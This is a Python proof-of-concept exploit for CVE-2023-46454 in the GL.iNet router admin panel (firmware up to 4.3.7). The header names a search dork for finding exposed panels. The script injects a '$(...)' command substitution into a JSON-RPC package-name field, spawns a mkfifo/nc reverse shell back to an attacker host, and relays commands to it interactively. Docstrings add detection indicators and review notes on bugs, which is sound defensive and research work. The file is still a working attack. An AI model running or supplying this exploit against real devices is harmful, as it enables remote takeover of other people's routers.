#!/usr/bin/env python3
# Exploit Title: GL.iNet <= 4.3.7 Remote Code Execution via OpenVPN Client
# Google Dork: intitle:"GL.iNet Admin Panel"
# Date: XX/11/2023
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
# Vendor Homepage: https://www.gli-net.com
# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar
# Version: 4.3.7
# Tested on: GL.iNet AR300M
# CVE: CVE-2023-46454
"""Proof of concept for CVE-2023-46454 (GL.iNet admin panel, firmware <= 4.3.7).

What the code below actually does, for readers assessing exposure:

* ``trigger_revshell`` sends one JSON-RPC ``call`` to ``<TARGET_URL>/rpc`` for
  method ``plugins.get_package_info``; the ``name`` argument embeds a shell
  command substitution (``$(...)``) inside the string ``base-files``.
* The call carries an ``auth_token`` as the first positional parameter, so an
  already-valid admin session token is a precondition for this PoC.
* ``revshell_listen`` waits for the device to connect back to ``<REVSHELL_IP>:
  <REVSHELL_PORT>`` and relays commands interactively.

Detection / mitigation angles visible from this script: an RPC request whose
``params`` for ``get_package_info`` contain ``$(`` or other shell metacharacters
in ``name`` is a clear anomaly; an outbound TCP connection from the router
(``nc``) to an arbitrary host right after such a request is the second
indicator. The header states affected versions as <= 4.3.7; confirm the fixed
release against the vendor advisory rather than this file.
"""

import socket
import requests
import readline  # imported for its side effect on input(): line editing/history
from time import sleep
from random import randint
from sys import stdout, argv
from threading import Thread

# TLS certificate verification is disabled below (verify=False); this only
# silences the resulting InsecureRequestWarning.
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)


def trigger_revshell(url: str, auth_token: str, payload: str) -> None:
    """Send the single JSON-RPC request that carries the injected payload.

    Args:
        url: full RPC endpoint, ``<TARGET_URL>/rpc`` as built by ``main``.
        auth_token: session token passed as the first RPC parameter.
        payload: shell command substitution spliced into the package name.

    The HTTP response is discarded; success is judged only by whether the
    listener in ``revshell_listen`` receives a connection.
    """
    # Short delay so the listener thread (the main thread in practice) can
    # bind before the device tries to connect back — presumably the intent,
    # there is no explicit synchronisation.
    sleep(0.25)
    data = {
        'jsonrpc': '2.0',
        'id': randint(1000, 9999),  # arbitrary JSON-RPC request id
        'method': 'call',
        'params': [
            auth_token,
            'plugins',
            'get_package_info',
            # Injection point: payload is inserted between "bas" and "e-files",
            # so the argument still reads as the package name "base-files".
            {'name': 'bas{}e-files'.format(payload)}
        ]
    }
    # verify=False: certificate validation is skipped (self-signed device certs).
    requests.post(url, json=data, verify=False)


def get_command_response(s: socket.socket) -> str:
    """Read from *s* one byte at a time until the socket read times out.

    Args:
        s: connected socket; its timeout (set by the caller) bounds the wait.

    Returns:
        Everything received, decoded as UTF-8.

    NOTE(review): each byte is decoded on its own, so any byte of a multi-byte
    UTF-8 sequence raises UnicodeDecodeError and is dropped — non-ASCII output
    is silently lost. NOTE(review): if the peer closes the connection,
    ``recv`` returns ``b''``, which decodes to ``''`` without raising, so this
    loop never terminates on EOF; only the timeout ends it.
    """
    res = ''
    while True:
        try:
            resp = s.recv(1).decode('utf-8')
            res += resp
        except UnicodeDecodeError:
            pass
        except socket.timeout:
            break
    return res


def revshell_listen(revshell_ip: str, revshell_port: str) -> None:
    """Accept one inbound connection and relay an interactive command loop.

    Args:
        revshell_ip: local address to bind.
        revshell_port: local port to bind (string from argv, converted with int()).

    Exits the process with status 1 if binding fails. Waits at most 5 seconds
    (``s.settimeout(5)``) for a connection; afterwards each command read from
    stdin is sent with a trailing newline and the reply is printed as read by
    ``get_command_response``.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    try:
        s.bind((revshell_ip, int(revshell_port)))
        s.listen(1)
    except Exception as e:
        print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))
        exit(1)
    try:
        clsock, claddr = s.accept()
        # 2-second read timeout on the client socket is what ends each
        # get_command_response() call.
        clsock.settimeout(2)
        # A socket object is always truthy; this check never skips the loop.
        if clsock:
            print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))
            res = ''  # unused
            while True:
                command = input('$ ')
                clsock.sendall('{}\n'.format(command).encode('utf-8'))
                stdout.write(get_command_response(clsock))
    except socket.timeout:
        # Also reached if clsock.sendall() times out inside the loop, in which
        # case this message is misleading.
        print('[-] No connection received in 5 seconds, probably server is not vulnerable...')
        s.close()
    except KeyboardInterrupt:
        print('\n[*] Closing connection')
        try:
            clsock.close()
        except socket.error:
            pass
        except NameError:
            # Ctrl-C arrived before accept() returned, so clsock was never bound.
            pass
        s.close()


def main(base_url: str, auth_token: str, revshell_ip: str, revshell_port: str) -> None:
    """Build the payload, fire the RPC request in a thread and start the listener.

    Args:
        base_url: target admin panel base URL; ``/rpc`` is appended.
        auth_token: session token forwarded to ``trigger_revshell``.
        revshell_ip: address the device is told to connect back to.
        revshell_port: port the device is told to connect back to.
    """
    print('[+] Started GL.iNet <= 4.3.7 RCE exploit')
    # The injected string is a $(...) substitution: a named pipe in /tmp
    # wired to `sh -i` and `nc` pointed at the listener address. A string like
    # this inside the "name" RPC parameter is the signature to look for in
    # device or proxy logs.
    payload = '$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {} {} >/tmp/f)'.format(revshell_ip, revshell_port)
    print('[+] Reverse shell payload: "{}"'.format(payload))
    print('[*] Triggering reverse shell connection')
    # Non-daemon thread: the request goes out after trigger_revshell's 0.25 s
    # delay while this thread proceeds to bind the listener.
    Thread(target=trigger_revshell, args=(base_url+'/rpc', auth_token, payload)).start()
    print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))
    revshell_listen(revshell_ip, revshell_port)
    print('[+] Done')


if __name__ == '__main__':
    # Four positional arguments are required; anything beyond them is ignored.
    if len(argv) < 5:
        print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))
        exit(1)
    main(argv[1], argv[2], argv[3], argv[4])